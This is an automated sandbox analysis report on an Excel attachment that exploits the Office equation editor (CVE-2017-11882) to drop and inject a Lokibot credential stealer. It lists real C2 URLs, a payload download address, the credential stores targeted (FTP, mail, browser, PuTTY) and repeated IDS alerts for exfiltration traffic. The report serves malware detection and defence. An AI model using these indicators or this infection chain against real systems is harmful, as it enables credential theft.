Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
_2201S_BUSAN_HOCHIMINH_.xlsx

Overview

General Information

Sample Name:_2201S_BUSAN_HOCHIMINH_.xlsx
Analysis ID:569962
MD5:cf8b307caa943326ee808bb3cb02deee
SHA1:705c25adbdb7b805e47566540b3804eba178e7da
SHA256:cbe84e2c523fd51dabb1365df50415ffc51f8159c36798061742f08ba5d31b9b
Tags:LokiVelvetSweatshopxlsx
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Droppers Exploiting CVE-2017-11882
Yara detected Lokibot
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file registry)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Searches the installation path of Mozilla Firefox
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Drops PE files to the user directory
Dropped file seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2580 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2984 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 1712 cmdline: "C:\Users\Public\vbc.exe" MD5: 7DF1896047D9647D818080DD17563D92)
      • xmtxpy.exe (PID: 2260 cmdline: C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd MD5: 1EACD504E4461F9EE286715997D8A9EE)
        • xmtxpy.exe (PID: 2556 cmdline: C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd MD5: 1EACD504E4461F9EE286715997D8A9EE)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
      00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_GENInfoStealerDetects executables containing common artifcats observed in infostealersditekSHen
        • 0x17936:$f1: FileZilla\recentservers.xml
        • 0x17976:$f2: FileZilla\sitemanager.xml
        • 0x15be6:$b2: Mozilla\Firefox\Profiles
        • 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
        • 0x15afa:$s4: logins.json
        • 0x169a4:$s6: wand.dat
        • 0x15424:$a1: username_value
        • 0x15414:$a2: password_value
        • 0x15a5f:$a3: encryptedUsername
        • 0x15acc:$a3: encryptedUsername
        • 0x15a72:$a4: encryptedPassword
        • 0x15ae0:$a4: encryptedPassword
        00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmpLoki_1Loki Payloadkevoreilly
        • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
        • 0x153fc:$a2: last_compatible_version
        Click to see the 35 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        6.2.xmtxpy.exe.400000.0.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          6.2.xmtxpy.exe.400000.0.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
            6.2.xmtxpy.exe.400000.0.raw.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
              6.2.xmtxpy.exe.400000.0.raw.unpackINDICATOR_SUSPICIOUS_GENInfoStealerDetects executables containing common artifcats observed in infostealersditekSHen
              • 0x17936:$f1: FileZilla\recentservers.xml
              • 0x17976:$f2: FileZilla\sitemanager.xml
              • 0x15be6:$b2: Mozilla\Firefox\Profiles
              • 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
              • 0x15afa:$s4: logins.json
              • 0x169a4:$s6: wand.dat
              • 0x15424:$a1: username_value
              • 0x15414:$a2: password_value
              • 0x15a5f:$a3: encryptedUsername
              • 0x15acc:$a3: encryptedUsername
              • 0x15a72:$a4: encryptedPassword
              • 0x15ae0:$a4: encryptedPassword
              6.2.xmtxpy.exe.400000.0.raw.unpackLoki_1Loki Payloadkevoreilly
              • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
              • 0x153fc:$a2: last_compatible_version
              Click to see the 76 entries

              Sigma Signatures

              Exploits

              barindex
              Sigma detected: EQNEDT32.EXE connecting to internet
              Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 198.46.132.195, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2984, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
              Sigma detected: File Dropped By EQNEDT32EXE
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2984, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe

              System Summary

              barindex
              Sigma detected: Droppers Exploiting CVE-2017-11882
              Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2984, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 1712
              Sigma detected: Execution from Suspicious Folder
              Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2984, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 1712
              Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 1B 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2984, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
              Multi AV Scanner detection for submitted file
              Source: _2201S_BUSAN_HOCHIMINH_.xlsxVirustotal: Detection: 35%Perma Link
              Source: _2201S_BUSAN_HOCHIMINH_.xlsxReversingLabs: Detection: 32%
              Antivirus detection for URL or domain
              Source: http://198.46.132.195/windowSSH/.win32.exeAvira URL Cloud: Label: malware
              Source: http://asiaoil.bar//bobby/five/fre.phpAvira URL Cloud: Label: malware
              Multi AV Scanner detection for domain / URL
              Source: http://198.46.132.195/windowSSH/.win32.exeVirustotal: Detection: 7%Perma Link
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exeVirustotal: Detection: 21%Perma Link
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exeReversingLabs: Detection: 23%
              Machine Learning detection for dropped file
              Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exeJoe Sandbox ML: detected

              Exploits

              barindex
              Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
              Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Source: Binary string: wntdll.pdb source: xmtxpy.exe, 00000005.00000003.463241268.00000000005F0000.00000004.00000800.00020000.00000000.sdmp, xmtxpy.exe, 00000005.00000003.461526742.00000000023E0000.00000004.00000800.00020000.00000000.sdmp
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00405D7C FindFirstFileA,FindClose,4_2_00405D7C
              Source: C:\Users\Public\vbc.exeCode function: 4_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,4_2_004053AA
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00402630 FindFirstFileA,4_2_00402630
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,6_2_00403D74
              Source: global trafficDNS query: name: asiaoil.bar
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.46.132.195:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.46.132.195:80
              Source: excel.exeMemory has grown: Private usage: 5MB later: 61MB

              Networking

              barindex
              Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49166 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49166 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49166 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49166 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49167 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49167 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49167 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49167 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49168 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49168 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49168 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49168 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49169 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49169 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49169 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49169 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49170 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49170 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49170 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49170 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49171 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49171 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49171 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49171 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49172 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49172 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49172 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49172 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49173 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49173 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49173 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49173 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49174 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49174 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49174 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49174 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49175 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49175 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49175 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49175 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49176 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49176 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49176 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49176 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49177 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49177 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49177 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49177 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49178 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49178 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49178 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49178 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49179 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49179 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49179 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49179 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49180 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49180 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49180 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49180 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49181 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49181 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49181 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49181 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49182 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49182 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49182 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49182 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49183 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49183 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49183 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49183 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49184 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49184 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49184 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49184 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49185 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49185 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49185 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49185 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49186 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49186 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49186 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49186 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49187 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49187 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49187 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49187 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49188 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49188 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49188 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49188 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49189 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49189 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49189 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49189 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49190 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49190 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49190 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49190 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49191 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49191 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49191 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49191 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49192 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49192 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49192 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49192 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49193 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49193 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49193 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49193 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49194 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49194 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49194 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49194 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49195 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49195 -> 172.67.197.66:80
